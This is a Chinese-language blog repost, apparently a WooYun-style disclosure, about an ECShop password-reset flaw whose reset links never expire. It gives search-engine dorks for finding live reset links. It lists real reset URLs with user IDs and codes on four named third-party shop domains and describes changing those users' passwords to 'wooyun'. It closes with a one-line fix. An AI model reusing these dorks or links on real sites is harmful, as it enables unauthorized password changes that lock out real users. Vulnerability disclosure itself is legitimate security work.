纵有疾风起
人生不言弃
首页 > 博客 > 黑客攻防 > 正文

ECShop任意用户密码盲改漏洞 – 网站安全 – 自学p

2020-10-11 分类:黑客攻防 阅读(209) 评论(0) 扫描二维码 隐藏侧边

ECShop找回密码功能设计缺陷,修改密码链接没有时效性

可通过搜索引擎搜索关键词 来重置ecshop网站上的部分用户的密码

只是不知道用户名无法登陆,只能盲改密码

谷歌

inurl:user.php?act=get_password&uid=

 

ECShop任意用户密码盲改漏洞 – 网站安全 – 自学p插图

打开一个链接:
 

http://class.enfamily.cn/user.php?act=get_password&uid=277576&code=09d77a40ca80fdfbd33315131e554bb0

 

ECShop任意用户密码盲改漏洞 – 网站安全 – 自学p插图1

随便输入密码 例如:wooyun

 

ECShop任意用户密码盲改漏洞 – 网站安全 – 自学p插图2

已经修改成功,只是不知道用户名无法登陆。

其他搜索引擎

通过bing.com搜索关键词:user.php?act=get_password&uid=

 

ECShop任意用户密码盲改漏洞 – 网站安全 – 自学p插图3

找几个例子

 

http://www.yofus.com/user.php?act=get_password&uid=666167&code=e32d1180abe40484c2c3743e2393e5b0

密码同样改为wooyun
 

ECShop任意用户密码盲改漏洞 – 网站安全 – 自学p插图4

 

ECShop任意用户密码盲改漏洞 – 网站安全 – 自学p插图5

 

http://www.ziai168.com/user.php?act=get_password&uid=9086&code=f19cea38ba7af425a8d3eea5a0c4beb4

 

ECShop任意用户密码盲改漏洞 – 网站安全 – 自学p插图6

 

ECShop任意用户密码盲改漏洞 – 网站安全 – 自学p插图7

 

http://shop.careland.com.cn/user.php?act=get_password&uid=9163183&code=cad8dd2c08a321666e0da6a5bcc56e85

 

ECShop任意用户密码盲改漏洞 – 网站安全 – 自学p插图8

 

ECShop任意用户密码盲改漏洞 – 网站安全 – 自学p插图9

 

 

修复方案:

对修改密码的code设置一个时效性。
    上一篇: 某系统存在多处Cookie注入 – 网站安全 – 自学php

    下一篇: 别克汽车公司某分站拿shell – 网站安全 – 自学ph

AD:【更多看点】学生“冒死”偷拍老师,当看到最后一个,网友:这谁能顶得住

 收藏 (0)
未经允许不得转载:起风网 » ECShop任意用户密码盲改漏洞 – 网站安全 – 自学p
分享到: 生成海报
标签:

825e5b70b68d744d

相关推荐

评论 抢沙发

评论前必须登录!

立即登录